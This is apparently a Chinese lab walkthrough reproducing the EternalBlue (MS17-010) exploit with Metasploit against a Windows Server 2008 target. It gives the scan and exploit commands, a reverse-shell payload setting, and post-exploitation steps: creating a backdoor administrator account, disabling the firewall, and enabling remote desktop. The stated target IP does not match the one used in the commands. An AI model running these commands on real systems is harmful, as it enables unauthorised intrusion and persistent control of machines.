天天看点

永恒之蓝漏洞复现

影响版本:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows

Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server

2012 SP0。

环境搭建:

  • 攻击机:kali IP:192.168.120.158
  • 靶机:windows server 2008 IP:192.168.120.120
  • 启动数据库:msfdb start 或者 service postgresql start

具体过程:

1.在kali终端中打开msfconsole,查找ms17_010漏洞模块

search ms17_010
           
永恒之蓝漏洞复现

2.先用auxiliary/scanner/smb/smb_ms17_010模块扫描目标主机是否存在该漏洞

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.120.160
           
永恒之蓝漏洞复现

3.可以看到扫描结果是目标主机可能存在ms17_010漏洞,开始攻击

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.120.160
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.120.158
           
永恒之蓝漏洞复现

4.攻击成功

永恒之蓝漏洞复现

5.用shell命令拿到shell控制台权限,进行后门植入

net user hack 123 /add
net localgroup administrators hack /add
net user
net localgroup administrators
           
永恒之蓝漏洞复现

6.关闭目标防火墙

netsh advfirewall set allprofiles state off
           
永恒之蓝漏洞复现
永恒之蓝漏洞复现

7.打开对方的3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
           
永恒之蓝漏洞复现
永恒之蓝漏洞复现

8.连接远程桌面

永恒之蓝漏洞复现

继续阅读